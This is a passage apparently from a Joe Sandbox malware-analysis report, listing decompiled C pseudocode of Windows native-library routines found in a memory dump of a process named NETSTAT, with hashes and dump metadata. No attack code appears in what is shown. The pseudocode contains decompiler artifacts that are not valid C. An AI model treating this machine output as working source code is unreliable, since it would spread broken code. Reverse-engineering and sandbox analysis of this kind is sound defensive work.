                                      				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                      				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                      				_v48 = __ecx;
                                      				_v36 = _t207;
                                      				_t157 = memset(_t245, 0, _t212 << 2);
                                      				_t256 = _t255 + 0xc;
                                      				_t246 = _t245 + _t212;
                                      				if(_t207 == 2) {
                                      					_t247 =  *(_t237 + 0x60);
                                      					_t208 =  *(_t237 + 0x64);
                                      					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                      					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                      					_v104 = _t159;
                                      					_v76 = _t159;
                                      					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                      					_v100 = _t160;
                                      					_v72 = _t160;
                                      					L19:
                                      					_v80 = _t208;
                                      					_v84 = _t247;
                                      					L8:
                                      					_t214 = 0;
                                      					if( *(_t237 + 0x74) > 0) {
                                      						_t82 = _t237 + 0x84; // 0x124
                                      						_t161 = _t82;
                                      						_v92 = _t161;
                                      						while( *_t161 >> 0x1f != 0) {
                                      							_t200 = _v92;
                                      							if( *_t200 == 0x80000000) {
                                      								break;
                                      							}
                                      							_t214 = _t214 + 1;
                                      							_t161 = _t200 + 0x10;
                                      							_v92 = _t161;
                                      							if(_t214 <  *(_t237 + 0x74)) {
                                      								continue;
                                      							}
                                      							goto L9;
                                      						}
                                      						_v88 = _t214 << 4;
                                      						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                      						_t165 = 0;
                                      						asm("adc eax, [ecx+edx+0x7c]");
                                      						_v24 = _t165;
                                      						_v28 = _v40;
                                      						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                      						_t221 = _v40;
                                      						_v16 =  *_v92;
                                      						_v32 =  &_v28;
                                      						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                      							goto L9;
                                      						}
                                      						_t240 = _v48;
                                      						if( *_v92 != 0x80000000) {
                                      							goto L9;
                                      						}
                                      						 *((intOrPtr*)(_t221 + 8)) = 0;
                                      						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                      						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                      						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                      						_t226 = 0;
                                      						_t181 = _t251 + 0x66;
                                      						_v88 = 0;
                                      						_v92 = _t181;
                                      						do {
                                      							if( *((char*)(_t181 - 2)) == 0) {
                                      								goto L31;
                                      							}
                                      							_t226 = _v88;
                                      							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                      								_t181 = E02EAD0F0(1, _t226 + 0x20, 0);
                                      								_t226 = _v40;
                                      								 *(_t226 + 8) = _t181;
                                      								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                      								L34:
                                      								if(_v44 == 0) {
                                      									goto L9;
                                      								}
                                      								_t210 = _v44;
                                      								_t127 = _t210 + 0x1c; // 0x1c
                                      								_t249 = _t127;
                                      								E02E82280(_t181, _t127);
                                      								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                      								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                      								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                      									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                      								}
                                      								_t189 = L02E84620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                      								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                      								if(_t189 != 0) {
                                      									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                      									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                      									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                      									 *_t232 = _t232 + 0x10;
                                      									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                      									E02EAF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                      									_t256 = _t256 + 0xc;
                                      								}
                                      								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                      								E02E7FFB0(_t210, _t249, _t249);
                                      								_t222 = _v76;
                                      								_t172 = _v80;
                                      								_t208 = _v84;
                                      								_t247 = _v88;
                                      								L10:
                                      								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                      								_v44 = _t238;
                                      								if(_t238 != 0) {
                                      									 *0x2f5b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                      									_v44();
                                      								}
                                      								_pop(_t248);
                                      								_pop(_t252);
                                      								_pop(_t209);
                                      								return E02EAB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                      							}
                                      							_t181 = _v92;
                                      							L31:
                                      							_t226 = _t226 + 1;
                                      							_t181 =  &(_t181[0x18]);
                                      							_v88 = _t226;
                                      							_v92 = _t181;
                                      						} while (_t226 < 4);
                                      						goto L34;
                                      					}
                                      					L9:
                                      					_t172 = _v104;
                                      					_t222 = _v100;
                                      					goto L10;
                                      				}
                                      				_t247 = _t246 | 0xffffffff;
                                      				_t208 = _t247;
                                      				_v84 = _t247;
                                      				_v80 = _t208;
                                      				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                      					_t233 = _v72;
                                      					_v105 = _v64;
                                      					_t202 = _v76;
                                      				} else {
                                      					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                      					_v105 = 1;
                                      					if(_v63 <= _t204) {
                                      						_v63 = _t204;
                                      					}
                                      					_t202 = _v76 |  *(_t251 + 0x40);
                                      					_t233 = _v72 |  *(_t251 + 0x44);
                                      					_t247 =  *(_t251 + 0x38);
                                      					_t208 =  *(_t251 + 0x3c);
                                      					_v76 = _t202;
                                      					_v72 = _t233;
                                      					_v84 = _t247;
                                      					_v80 = _t208;
                                      				}
                                      				_v104 = _t202;
                                      				_v100 = _t233;
                                      				if( *((char*)(_t251 + 0xc4)) != 0) {
                                      					_t237 = _v48;
                                      					_v105 = 1;
                                      					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                      						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                      						_t237 = _v48;
                                      					}
                                      					_t203 = _t202 |  *(_t251 + 0xb8);
                                      					_t234 = _t233 |  *(_t251 + 0xbc);
                                      					_t247 = _t247 &  *(_t251 + 0xb0);
                                      					_t208 = _t208 &  *(_t251 + 0xb4);
                                      					_v104 = _t203;
                                      					_v76 = _t203;
                                      					_v100 = _t234;
                                      					_v72 = _t234;
                                      					_v84 = _t247;
                                      					_v80 = _t208;
                                      				}
                                      				if(_v105 == 0) {
                                      					_v36 = _v36 & 0x00000000;
                                      					_t208 = 0;
                                      					_t247 = 0;
                                      					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                      					goto L19;
                                      				} else {
                                      					_v36 = 1;
                                      					goto L8;
                                      				}
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c253d1573cfe667b1fda00a2f221fd693b51be40e4b1f27510da0ecc41689ac
                                      • Instruction ID: 898eaf99c2066d9208dc1c61df46f09d242af83d098c928a15c410aae0c3d130
                                      • Opcode Fuzzy Hash: 1c253d1573cfe667b1fda00a2f221fd693b51be40e4b1f27510da0ecc41689ac
                                      • Instruction Fuzzy Hash: 0BC121755483808FD355CF29C580A6AFBF1BF88308F149A6EF8998B352D771E946CB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 74%
                                      			E02E903E2(signed int __ecx, signed int __edx) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				signed int _v36;
                                      				intOrPtr _v40;
                                      				signed int _v44;
                                      				signed int _v48;
                                      				char _v52;
                                      				char _v56;
                                      				char _v64;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t56;
                                      				signed int _t58;
                                      				char* _t64;
                                      				intOrPtr _t65;
                                      				signed int _t74;
                                      				signed int _t79;
                                      				char* _t83;
                                      				intOrPtr _t84;
                                      				signed int _t93;
                                      				signed int _t94;
                                      				signed char* _t95;
                                      				signed int _t99;
                                      				signed int _t100;
                                      				signed char* _t101;
                                      				signed int _t105;
                                      				signed int _t119;
                                      				signed int _t120;
                                      				void* _t122;
                                      				signed int _t123;
                                      				signed int _t127;
                                      
                                      				_v8 =  *0x2f5d360 ^ _t127;
                                      				_t119 = __ecx;
                                      				_t105 = __edx;
                                      				_t118 = 0;
                                      				_v20 = __edx;
                                      				_t120 =  *(__ecx + 0x20);
                                      				if(E02E90548(__ecx, 0) != 0) {
                                      					_t56 = 0xc000022d;
                                      					L23:
                                      					return E02EAB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                      				} else {
                                      					_v12 = _v12 | 0xffffffff;
                                      					_t58 = _t120 + 0x24;
                                      					_t109 =  *(_t120 + 0x18);
                                      					_t118 = _t58;
                                      					_v16 = _t58;
                                      					E02E7B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                      					_v52 = 0x18;
                                      					_v48 = 0;
                                      					0x840 = 0x40;
                                      					if( *0x2f57c1c != 0) {
                                      					}
                                      					_v40 = 0x840;
                                      					_v44 = _t105;
                                      					_v36 = 0;
                                      					_v32 = 0;
                                      					if(E02E87D50() != 0) {
                                      						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      					} else {
                                      						_t64 = 0x7ffe0384;
                                      					}
                                      					if( *_t64 != 0) {
                                      						_t65 =  *[fs:0x30];
                                      						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                      						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                      							_t100 = E02E87D50();
                                      							__eflags = _t100;
                                      							if(_t100 == 0) {
                                      								_t101 = 0x7ffe0385;
                                      							} else {
                                      								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                      							}
                                      							__eflags =  *_t101 & 0x00000020;
                                      							if(( *_t101 & 0x00000020) != 0) {
                                      								_t118 = _t118 | 0xffffffff;
                                      								_t109 = 0x1485;
                                      								E02EE7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                      							}
                                      						}
                                      					}
                                      					_t105 = 0;
                                      					while(1) {
                                      						_push(0x60);
                                      						_push(5);
                                      						_push( &_v64);
                                      						_push( &_v52);
                                      						_push(0x100021);
                                      						_push( &_v12);
                                      						_t122 = E02EA9830();
                                      						if(_t122 >= 0) {
                                      							break;
                                      						}
                                      						__eflags = _t122 - 0xc0000034;
                                      						if(_t122 == 0xc0000034) {
                                      							L38:
                                      							_t120 = 0xc0000135;
                                      							break;
                                      						}
                                      						__eflags = _t122 - 0xc000003a;
                                      						if(_t122 == 0xc000003a) {
                                      							goto L38;
                                      						}
                                      						__eflags = _t122 - 0xc0000022;
                                      						if(_t122 != 0xc0000022) {
                                      							break;
                                      						}
                                      						__eflags = _t105;
                                      						if(__eflags != 0) {
                                      							break;
                                      						}
                                      						_t109 = _t119;
                                      						_t99 = E02EE69A6(_t119, __eflags);
                                      						__eflags = _t99;
                                      						if(_t99 == 0) {
                                      							break;
                                      						}
                                      						_t105 = _t105 + 1;
                                      					}
                                      					if( !_t120 >= 0) {
                                      						L22:
                                      						_t56 = _t120;
                                      						goto L23;
                                      					}
                                      					if( *0x2f57c04 != 0) {
                                      						_t118 = _v12;
                                      						_t120 = E02EEA7AC(_t119, _t118, _t109);
                                      						__eflags = _t120;
                                      						if(_t120 >= 0) {
                                      							goto L10;
                                      						}
                                      						__eflags =  *0x2f57bd8;
                                      						if( *0x2f57bd8 != 0) {
                                      							L20:
                                      							if(_v12 != 0xffffffff) {
                                      								_push(_v12);
                                      								E02EA95D0();
                                      							}
                                      							goto L22;
                                      						}
                                      					}
                                      					L10:
                                      					_push(_v12);
                                      					_t105 = _t119 + 0xc;
                                      					_push(0x1000000);
                                      					_push(0x10);
                                      					_push(0);
                                      					_push(0);
                                      					_push(0xf);
                                      					_push(_t105);
                                      					_t120 = E02EA99A0();
                                      					if(_t120 < 0) {
                                      						__eflags = _t120 - 0xc000047e;
                                      						if(_t120 == 0xc000047e) {
                                      							L51:
                                      							_t74 = E02EE3540(_t120);
                                      							_t119 = _v16;
                                      							_t120 = _t74;
                                      							L52:
                                      							_t118 = 0x1485;
                                      							E02E6B1E1(_t120, 0x1485, 0, _t119);
                                      							goto L20;
                                      						}
                                      						__eflags = _t120 - 0xc000047f;
                                      						if(_t120 == 0xc000047f) {
                                      							goto L51;
                                      						}
                                      						__eflags = _t120 - 0xc0000462;
                                      						if(_t120 == 0xc0000462) {
                                      							goto L51;
                                      						}
                                      						_t119 = _v16;
                                      						__eflags = _t120 - 0xc0000017;
                                      						if(_t120 != 0xc0000017) {
                                      							__eflags = _t120 - 0xc000009a;
                                      							if(_t120 != 0xc000009a) {
                                      								__eflags = _t120 - 0xc000012d;
                                      								if(_t120 != 0xc000012d) {
                                      									_v28 = _t119;
                                      									_push( &_v56);
                                      									_push(1);
                                      									_v24 = _t120;
                                      									_push( &_v28);
                                      									_push(1);
                                      									_push(2);
                                      									_push(0xc000007b);
                                      									_t79 = E02EAAAF0();
                                      									__eflags = _t79;
                                      									if(_t79 >= 0) {
                                      										__eflags =  *0x2f58474 - 3;
                                      										if( *0x2f58474 != 3) {
                                      											 *0x2f579dc =  *0x2f579dc + 1;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      						goto L52;
                                      					}
                                      					if(E02E87D50() != 0) {
                                      						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                      					} else {
                                      						_t83 = 0x7ffe0384;
                                      					}
                                      					if( *_t83 != 0) {
                                      						_t84 =  *[fs:0x30];
                                      						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                      						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                      							_t94 = E02E87D50();
                                      							__eflags = _t94;
                                      							if(_t94 == 0) {
                                      								_t95 = 0x7ffe0385;
                                      							} else {
                                      								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                      							}
                                      							__eflags =  *_t95 & 0x00000020;
                                      							if(( *_t95 & 0x00000020) != 0) {
                                      								E02EE7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                      							}
                                      						}
                                      					}
                                      					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                      						if( *0x2f58708 != 0) {
                                      							_t118 =  *0x7ffe0330;
                                      							_t123 =  *0x2f57b00; // 0x0
                                      							asm("ror esi, cl");
                                      							 *0x2f5b1e0(_v12, _v20, 0x20);
                                      							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                      							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                      							asm("sbb esi, esi");
                                      							_t120 =  ~_t50 & _t93;
                                      						} else {
                                      							_t120 = 0;
                                      						}
                                      					}
                                      					if( !_t120 >= 0) {
                                      						L19:
                                      						_push( *_t105);
                                      						E02EA95D0();
                                      						 *_t105 =  *_t105 & 0x00000000;
                                      						goto L20;
                                      					}
                                      					_t120 = E02E77F65(_t119);
                                      					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                      						__eflags = _t120;
                                      						if(_t120 < 0) {
                                      							goto L19;
                                      						}
                                      						 *(_t119 + 0x64) = _v12;
                                      						goto L22;
                                      					}
                                      					goto L19;
                                      				}
                                      			}









































                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0be40836ab301d962ce76bbba922507f23692750e7a48941ae588bb0179238c1
                                      • Instruction ID: ab53ef69f419ef7a86cc567a5f69fa2eb146d937d79a6de1b6640c4b6664f709
                                      • Opcode Fuzzy Hash: 0be40836ab301d962ce76bbba922507f23692750e7a48941ae588bb0179238c1
                                      • Instruction Fuzzy Hash: 3F914B31EC0214AFEF319B68C844BADBBA5AB06718F05A262FD11AB2D0D7749D41CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 67%
                                      			E02E6C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                      				signed int _v8;
                                      				char _v1036;
                                      				signed int _v1040;
                                      				char _v1048;
                                      				signed int _v1052;
                                      				signed char _v1056;
                                      				void* _v1058;
                                      				char _v1060;
                                      				signed int _v1064;
                                      				void* _v1068;
                                      				intOrPtr _v1072;
                                      				void* _v1084;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				intOrPtr _t70;
                                      				intOrPtr _t72;
                                      				signed int _t74;
                                      				intOrPtr _t77;
                                      				signed int _t78;
                                      				signed int _t81;
                                      				void* _t101;
                                      				signed int _t102;
                                      				signed int _t107;
                                      				signed int _t109;
                                      				signed int _t110;
                                      				signed char _t111;
                                      				signed int _t112;
                                      				signed int _t113;
                                      				signed int _t114;
                                      				intOrPtr _t116;
                                      				void* _t117;
                                      				char _t118;
                                      				void* _t120;
                                      				char _t121;
                                      				signed int _t122;
                                      				signed int _t123;
                                      				signed int _t125;
                                      
                                      				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                      				_v8 =  *0x2f5d360 ^ _t125;
                                      				_t116 = _a4;
                                      				_v1056 = _a16;
                                      				_v1040 = _a24;
                                      				if(E02E76D30( &_v1048, _a8) < 0) {
                                      					L4:
                                      					_pop(_t117);
                                      					_pop(_t120);
                                      					_pop(_t101);
                                      					return E02EAB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                      				}
                                      				_t70 = _a20;
                                      				if(_t70 >= 0x3f4) {
                                      					_t121 = _t70 + 0xc;
                                      					L19:
                                      					_t107 =  *( *[fs:0x30] + 0x18);
                                      					__eflags = _t107;
                                      					if(_t107 == 0) {
                                      						L60:
                                      						_t68 = 0xc0000017;
                                      						goto L4;
                                      					}
                                      					_t72 =  *0x2f57b9c; // 0x0
                                      					_t74 = L02E84620(_t107, _t107, _t72 + 0x180000, _t121);
                                      					_v1064 = _t74;
                                      					__eflags = _t74;
                                      					if(_t74 == 0) {
                                      						goto L60;
                                      					}
                                      					_t102 = _t74;
                                      					_push( &_v1060);
                                      					_push(_t121);
                                      					_push(_t74);
                                      					_push(2);
                                      					_push( &_v1048);
                                      					_push(_t116);
                                      					_t122 = E02EA9650();
                                      					__eflags = _t122;
                                      					if(_t122 >= 0) {
                                      						L7:
                                      						_t114 = _a12;
                                      						__eflags = _t114;
                                      						if(_t114 != 0) {
                                      							_t77 = _a20;
                                      							L26:
                                      							_t109 =  *(_t102 + 4);
                                      							__eflags = _t109 - 3;
                                      							if(_t109 == 3) {
                                      								L55:
                                      								__eflags = _t114 - _t109;
                                      								if(_t114 != _t109) {
                                      									L59:
                                      									_t122 = 0xc0000024;
                                      									L15:
                                      									_t78 = _v1052;
                                      									__eflags = _t78;
                                      									if(_t78 != 0) {
                                      										L02E877F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                      									}
                                      									_t68 = _t122;
                                      									goto L4;
                                      								}
                                      								_t110 = _v1056;
                                      								_t118 =  *((intOrPtr*)(_t102 + 8));
                                      								_v1060 = _t118;
                                      								__eflags = _t110;
                                      								if(_t110 == 0) {
                                      									L10:
                                      									_t122 = 0x80000005;
                                      									L11:
                                      									_t81 = _v1040;
                                      									__eflags = _t81;
                                      									if(_t81 == 0) {
                                      										goto L15;
                                      									}
                                      									__eflags = _t122;
                                      									if(_t122 >= 0) {
                                      										L14:
                                      										 *_t81 = _t118;
                                      										goto L15;
                                      									}
                                      									__eflags = _t122 - 0x80000005;
                                      									if(_t122 != 0x80000005) {
                                      										goto L15;
                                      									}
                                      									goto L14;
                                      								}
                                      								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                      								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                      									goto L10;
                                      								}
                                      								_push( *((intOrPtr*)(_t102 + 8)));
                                      								_t59 = _t102 + 0xc; // 0xc
                                      								_push(_t110);
                                      								L54:
                                      								E02EAF3E0();
                                      								_t125 = _t125 + 0xc;
                                      								goto L11;
                                      							}
                                      							__eflags = _t109 - 7;
                                      							if(_t109 == 7) {
                                      								goto L55;
                                      							}
                                      							_t118 = 4;
                                      							__eflags = _t109 - _t118;
                                      							if(_t109 != _t118) {
                                      								__eflags = _t109 - 0xb;
                                      								if(_t109 != 0xb) {
                                      									__eflags = _t109 - 1;
                                      									if(_t109 == 1) {
                                      										__eflags = _t114 - _t118;
                                      										if(_t114 != _t118) {
                                      											_t118 =  *((intOrPtr*)(_t102 + 8));
                                      											_v1060 = _t118;
                                      											__eflags = _t118 - _t77;
                                      											if(_t118 > _t77) {
                                      												goto L10;
                                      											}
                                      											_push(_t118);
                                      											_t56 = _t102 + 0xc; // 0xc
                                      											_push(_v1056);
                                      											goto L54;
                                      										}
                                      										__eflags = _t77 - _t118;
                                      										if(_t77 != _t118) {
                                      											L34:
                                      											_t122 = 0xc0000004;
                                      											goto L15;
                                      										}
                                      										_t111 = _v1056;
                                      										__eflags = _t111 & 0x00000003;
                                      										if((_t111 & 0x00000003) == 0) {
                                      											_v1060 = _t118;
                                      											__eflags = _t111;
                                      											if(__eflags == 0) {
                                      												goto L10;
                                      											}
                                      											_t42 = _t102 + 0xc; // 0xc
                                      											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                      											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                      											_push(_t111);
                                      											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                      											_push(0);
                                      											_push( &_v1048);
                                      											_t122 = E02EA13C0(_t102, _t118, _t122, __eflags);
                                      											L44:
                                      											_t118 = _v1072;
                                      											goto L11;
                                      										}
                                      										_t122 = 0x80000002;
                                      										goto L15;
                                      									}
                                      									_t122 = 0xc0000024;
                                      									goto L44;
                                      								}
                                      								__eflags = _t114 - _t109;
                                      								if(_t114 != _t109) {
                                      									goto L59;
                                      								}
                                      								_t118 = 8;
                                      								__eflags = _t77 - _t118;
                                      								if(_t77 != _t118) {
                                      									goto L34;
                                      								}
                                      								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                      								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                      									goto L34;
                                      								}
                                      								_t112 = _v1056;
                                      								_v1060 = _t118;
                                      								__eflags = _t112;
                                      								if(_t112 == 0) {
                                      									goto L10;
                                      								}
                                      								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                      								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                      								goto L11;
                                      							}
                                      							__eflags = _t114 - _t118;
                                      							if(_t114 != _t118) {
                                      								goto L59;
                                      							}
                                      							__eflags = _t77 - _t118;
                                      							if(_t77 != _t118) {
                                      								goto L34;
                                      							}
                                      							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                      							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                      								goto L34;
                                      							}
                                      							_t113 = _v1056;
                                      							_v1060 = _t118;
                                      							__eflags = _t113;
                                      							if(_t113 == 0) {
                                      								goto L10;
                                      							}
                                      							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                      							goto L11;
                                      						}
                                      						_t118 =  *((intOrPtr*)(_t102 + 8));
                                      						__eflags = _t118 - _a20;
                                      						if(_t118 <= _a20) {
                                      							_t114 =  *(_t102 + 4);
                                      							_t77 = _t118;
                                      							goto L26;
                                      						}
                                      						_v1060 = _t118;
                                      						goto L10;
                                      					}
                                      					__eflags = _t122 - 0x80000005;
                                      					if(_t122 != 0x80000005) {
                                      						goto L15;
                                      					}
                                      					L02E877F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                      					L18:
                                      					_t121 = _v1060;
                                      					goto L19;
                                      				}
                                      				_push( &_v1060);
                                      				_push(0x400);
                                      				_t102 =  &_v1036;
                                      				_push(_t102);
                                      				_push(2);
                                      				_push( &_v1048);
                                      				_push(_t116);
                                      				_t122 = E02EA9650();
                                      				if(_t122 >= 0) {
                                      					__eflags = 0;
                                      					_v1052 = 0;
                                      					goto L7;
                                      				}
                                      				if(_t122 == 0x80000005) {
                                      					goto L18;
                                      				}
                                      				goto L4;
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 64a0ce56d4deadcd922244de0301f497bdd7c1dede0a536159fd0e47ac5633df
                                      • Instruction ID: 4bee4e385ab7bb44f2dd60c623b7ca71427826b4cf3f55a8cba103a844ee0702
                                      • Opcode Fuzzy Hash: 64a0ce56d4deadcd922244de0301f497bdd7c1dede0a536159fd0e47ac5633df
                                      • Instruction Fuzzy Hash: FB81A3766842418BCB25CF14C890B7EF7E5EB88398F15E85AFD459B244D330ED42CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 39%
                                      			E02EFB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                      				char _v8;
                                      				signed int _v12;
                                      				signed int _t80;
                                      				signed int _t83;
                                      				intOrPtr _t89;
                                      				signed int _t92;
                                      				signed char _t106;
                                      				signed int* _t107;
                                      				intOrPtr _t108;
                                      				intOrPtr _t109;
                                      				signed int _t114;
                                      				void* _t115;
                                      				void* _t117;
                                      				void* _t119;
                                      				void* _t122;
                                      				signed int _t123;
                                      				signed int* _t124;
                                      
                                      				_t106 = _a12;
                                      				if((_t106 & 0xfffffffc) != 0) {
                                      					return 0xc000000d;
                                      				}
                                      				if((_t106 & 0x00000002) != 0) {
                                      					_t106 = _t106 | 0x00000001;
                                      				}
                                      				_t109 =  *0x2f57b9c; // 0x0
                                      				_t124 = L02E84620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                      				if(_t124 != 0) {
                                      					 *_t124 =  *_t124 & 0x00000000;
                                      					_t124[1] = _t124[1] & 0x00000000;
                                      					_t124[4] = _t124[4] & 0x00000000;
                                      					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                      						L13:
                                      						_push(_t124);
                                      						if((_t106 & 0x00000002) != 0) {
                                      							_push(0x200);
                                      							_push(0x28);
                                      							_push(0xffffffff);
                                      							_t122 = E02EA9800();
                                      							if(_t122 < 0) {
                                      								L33:
                                      								if((_t124[4] & 0x00000001) != 0) {
                                      									_push(4);
                                      									_t64 =  &(_t124[1]); // 0x4
                                      									_t107 = _t64;
                                      									_push(_t107);
                                      									_push(5);
                                      									_push(0xfffffffe);
                                      									E02EA95B0();
                                      									if( *_t107 != 0) {
                                      										_push( *_t107);
                                      										E02EA95D0();
                                      									}
                                      								}
                                      								_push(_t124);
                                      								_push(0);
                                      								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                      								L37:
                                      								L02E877F0();
                                      								return _t122;
                                      							}
                                      							_t124[4] = _t124[4] | 0x00000002;
                                      							L18:
                                      							_t108 = _a8;
                                      							_t29 =  &(_t124[0x105]); // 0x414
                                      							_t80 = _t29;
                                      							_t30 =  &(_t124[5]); // 0x14
                                      							_t124[3] = _t80;
                                      							_t123 = 0;
                                      							_t124[2] = _t30;
                                      							 *_t80 = _t108;
                                      							if(_t108 == 0) {
                                      								L21:
                                      								_t112 = 0x400;
                                      								_push( &_v8);
                                      								_v8 = 0x400;
                                      								_push(_t124[2]);
                                      								_push(0x400);
                                      								_push(_t124[3]);
                                      								_push(0);
                                      								_push( *_t124);
                                      								_t122 = E02EA9910();
                                      								if(_t122 != 0xc0000023) {
                                      									L26:
                                      									if(_t122 != 0x106) {
                                      										L40:
                                      										if(_t122 < 0) {
                                      											L29:
                                      											_t83 = _t124[2];
                                      											if(_t83 != 0) {
                                      												_t59 =  &(_t124[5]); // 0x14
                                      												if(_t83 != _t59) {
                                      													L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                      												}
                                      											}
                                      											_push( *_t124);
                                      											E02EA95D0();
                                      											goto L33;
                                      										}
                                      										 *_a16 = _t124;
                                      										return 0;
                                      									}
                                      									if(_t108 != 1) {
                                      										_t122 = 0;
                                      										goto L40;
                                      									}
                                      									_t122 = 0xc0000061;
                                      									goto L29;
                                      								} else {
                                      									goto L22;
                                      								}
